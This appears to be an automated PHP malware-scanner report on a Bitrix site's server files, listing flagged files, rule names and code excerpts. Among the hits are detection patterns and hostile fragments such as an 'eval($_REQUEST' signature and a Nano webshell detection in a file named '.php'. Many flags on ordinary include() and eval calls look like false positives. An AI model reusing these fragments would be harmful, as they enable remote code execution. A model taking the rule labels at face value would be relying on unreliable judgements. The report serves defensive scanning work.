Report

Version: 0.10.4
Scan date: 2024-03-04 15:46:35
Files analyzed: 17748 | Files infected: 306

/var/www/kievflotq/kievflot.ua/bitrix/index.php

Size: 83.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:42 Dangers: 1
Description | Match

Sign 0f37c730 Line: 2 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/scripts/template.php

Size: 15.72 kB Created: 2017-05-21 22:21:52 Modified: 2023-06-30 13:57:55 Warns: 1
Description | Match

Function eval Line: 462 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(response);
            }

            
CAjaxForm.prototype.ShowError = function(errorMessage)
            {
                var 
errorContainer document.getElementById("error_container");
                var 
errorText document.getElementById("error_text");
                if (!
errorContainer || !errorText)
                    return;

                var 
waitWindow document.getElementById("wait");
                if (
waitWindow)
                    
waitWindow.style.display "none";

                
errorContainer.style.display 'block';
                
errorText.innerHTML strip_tags(errorMessage);

                var 
retryButton = ...

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_private/download_private.php

Size: 3.71 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 1
Description | Match

Exploit execution Line: 127 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download_balance.php

Size: 3.00 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
Description | Match

Exploit execution Line: 47 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php")

Exploit execution Line: 95 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/download/download.php

Size: 2.09 kB Created: 2017-05-21 22:21:53 Modified: 2023-06-30 13:57:54 Dangers: 2
Description | Match

Exploit execution Line: 36 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php")

Exploit execution Line: 69 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/404.php")

/var/www/kievflotq/kievflot.ua/bitrix/backup/index.php

Size: 80.00 B Created: 2017-06-11 00:13:59 Modified: 2023-06-30 13:57:47 Dangers: 1
Description | Match

Sign 0f37c730 Line: 1 Dangerous

Malware Signature (hash: 0f37c730)

meta http-equiv="REFRESH" content="0;

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.post.form/templates/.default/template.php

Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:48 Dangers: 3
Description | Match

Exploit execution Line: 117 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 14 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/file.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/urlpreview.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.map/component.php

Size: 5.85 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1 Dangers: 1
Description | Match

Exploit execution Line: 157 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) continue; } $search_child false$search_path ''$full_path ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i"$aMenu[1])) { $full_path $aMenu[1]; } else { $full_path trim(Rel2Abs(substr($PARENT_PATHstrlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos strrpos($full_path"/"); if ($slash_pos !== false) { $page substr($full_path$slash_pos+1); if(($pos strpos($page'?')) !== false$page substr($page,...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.link.list/component.php

Size: 1.14 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Exploit double_var2 Line: 19 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FN}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.interface.grid/component.php

Size: 9.39 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions$arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface""global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> ''$arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == ''$arResult["OPTIONS"...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/b24connector.button.list/ajax.php

Size: 3.73 kB Created: 2017-11-21 16:21:54 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/script.php

Size: 26.06 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function eval Line: 140 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/.default/template.php

Size: 21.63 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
Description | Match

Exploit execution Line: 270 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/editor.php")

Exploit execution Line: 79 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.edit/templates/micro/template.php

Size: 4.16 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit execution Line: 84 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.ui.grid/templates/.default/template.php

Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
        var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
        var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
        var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);

        Grid = Grid ? Grid.instance : null;

        if (Grid)
        {
            Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
            Grid.arParams.MESSAGES = messages;

            if (action !== 'more')
            {
                Grid.arParams.EDITABLE_DATA ...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.filter/component.php

Size: 32.43 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Exploit double_var2 Line: 61 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.smart.filter/component.php

Size: 27.62 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Exploit double_var2 Line: 523 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/old_version_16/template.php

Size: 40.01 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit clever_include Line: 708 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
            "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
            "
BASKET_URL" => $arParams["BASKET_URL"],
            "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
            "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
            "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
            "
USE_PRODUCT_QUANTITY" => 'N',
            "
OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
            "
CART_PROPERTIES_{...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit clever_include Line: 1114 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                '
BASKET_URL' => $arParams['BASKET_URL'],
                                '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                '
USE_PRODUCT_QUANTITY' => 'N',
                                '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/main.user.link/component.php

Size: 19.17 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:49 Dangers: 1
Description | Match

Exploit execution Line: 440 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$folderPath."/card.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.sections.top/component.php

Size: 19.13 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php

Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:48 Dangers: 3
Description | Match

Exploit execution Line: 185 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 29 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.new_blogs/.php

Size: 56.68 kB Created: 2017-05-21 22:21:47 Modified: 2024-02-21 05:07:06 Warns: 1 Dangers: 1
Description | Match

Exploit nano Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.popular_blogs/component.php

Size: 5.77 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["VIEWS"] == $b["VIEWS"]) { if($a["NUM_COMMENTS"] < $b["NUM_COMMENTS"]) return 1; elseif($a["NUM_COMMENTS"] > $b["NUM_COMMENTS"]) return -1; else return 0;} return ($a["VIEWS"] < $b["VIEWS"])? 1 : -1;')); $i 0; foreach($arBlogs as $blogID => $info) { if($i >= $arParams["BLOG_COUNT"] && IntVal($arParams["BLOG_COUNT"]) > 0) continue; $arBlog CBlog::GetByID($blogID); $arBlog CBlogTools::htmlspecialcharsExArray($arBlog); $arBlog["BlogUser"] = CBlogUser::GetByID(...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Function eval Line: 338 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" res[ii].href "');};");
        
res[ii].parentNode.insertBefore(divres[ii]);
        
res[ii].onmouseover = function()
        {
            
this.previousSibling.onshow();
            
this.bxMouseOver 'Y';
        };
        
res[ii].onmouseout = function()
        {
            
this.bxMouseOver 'N';
            var 
__this this;
            
setTimeout(
                function()
                {
                    if (
__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        
__this.previousSibling...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 19.20 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Dangers: 2
Description | Match

Exploit execution Line: 146 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 27 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.64 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/script.php

Size: 22.93 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function eval Line: 97 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.edit/.default/template.php

Size: 23.20 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit execution Line: 355 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/script.php

Size: 11.35 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");

    if (
tagOpen == 0)
    {
        if (
doInsert("[" thetag "]""[/" thetag "]"true))
        {
            eval(
thetag "_open = 1");
            
// Change the button status

            
pushstack(bbtagsthetag);
            
cstat();
        }
    }
    else
    {
        
// Find the last occurance of the opened tag
        
lastindex 0;

        for (
bbtags.lengthi++ )
        {
            if ( 
bbtags[i] == thetag )
            {
                
lastindex i;
            }
        }

        
// Close all tags opened up to that tag was opened
        
while (bbtags[lastindex])
        {
            
tagR...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_with_main_page/bitrix/blog.post.comment/.default/template.php

Size: 20.56 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog/templates/one_blog_old_version/bitrix/blog.post.comment/.default/template.php

Size: 20.97 kB Created: 2017-05-21 22:21:50 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.list/component.php

Size: 23.88 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Exploit double_var2 Line: 244 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.46 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " data "; "); }
            if (
result['status'] == 'inprogress')
            {
                
document.getElementById('photogallery_recalc').innerHTML result['text'];
                if (
__this_source.bReady == false)
                {
                    
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled true;
                }
                else
                {
                    
document.getElementById(...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php

Size: 30.32 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Dangers: 1
Description | Match

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/mobileapp.menu/templates/.default/template.php

Size: 12.57 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("showAuthForm");
                }
            }
    <?endif;
?>

    if(BX.PULL)
    {
        BX.addCustomEvent("onPullExtendWatch", function(data) {
            BX.PULL.extendWatch(data.id);
        });

        BX.addCustomEvent("thisPageWillDie", function(data) {
            BX.PULL.clearWatch(data.page_id);
        });

        BX.addCustomEvent("onPullEvent", function (module_id, command, params)
        {
            if (module_id == 'main' && (command == 'user_authorize' || command == 'user_logout' || command == 'online_list'))
            {
                //app.onCustomEvent('onPullOnline', {...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.topic.active/component.php

Size: 18.38 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
Description | Match

Exploit double_var2 Line: 11 Warning

Double var technique is usually used for the obfuscation of malicious code

${$s}

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/rss.show/component.php

Size: 2.52 kB Created: 2017-05-21 22:21:47 Modified: 2023-06-30 13:57:49 Warns: 1
Description | Match

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$val, $key''$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT"array_walk_recursive($arResultcreate_function('&$val, $key''$val=str_replace(array("    ", "\\r\\n"), array("&nbsp;&nbsp;&nbsp;&nbsp;", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/blog.post.comment/templates/.default/template.php

Size: 30.38 kB Created: 2017-05-21 22:21:45 Modified: 2023-06-30 13:57:48 Dangers: 2
Description | Match

Exploit execution Line: 152 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/lhe.php")

Exploit execution Line: 20 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/bitrix/catalog.element/.default/template.php

Size: 40.07 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit clever_include Line: 713 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
            "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
            "
BASKET_URL" => $arParams["BASKET_URL"],
            "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
            "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
            "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
            "
USE_PRODUCT_QUANTITY" => 'N',
            "
OFFER_TREE_PROPS_{$arResult['OFFERS_IBLOCK']}" => $arParams['OFFER_TREE_PROPS'],
            "
CART_PROPERTIES_{...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section_vertical.php

Size: 19.71 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
Description | Match

Exploit clever_include Line: 44 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

include",
            "",
            Array(
                "AREA_FILE_SHOW" => "file",
                "PATH" => $arParams["SIDEBAR_PATH"],
                "AREA_FILE_RECURSIVE" => "N",
                "EDIT_MODE" => "html",
            ),
            false,
            array('HIDE_ICONS' => 'Y')
        );?>
    <?endif?>
</div>
<?endif?>
<div class="<?=(($isFilter || $isSidebar) ? "col-md-9 col-sm-8 col-sm-pull-4 col-md-pull-3" "col-xs-12")?>">
    <div class="row">
        <div class="col-xs-12">
            <?
                if(ModuleManager::isModuleInstalled("sale"))
                {
                    $arRecomData = array();
                    $recomC...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/.default/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.index/component.php

Size: 18.80 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 111 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/f0/f07dce8c4e2dc4854bf9f47be3173581.php

Size: 58.42 kB Created: 2024-03-03 10:42:43 Modified: 2024-03-03 10:42:43 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 433 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

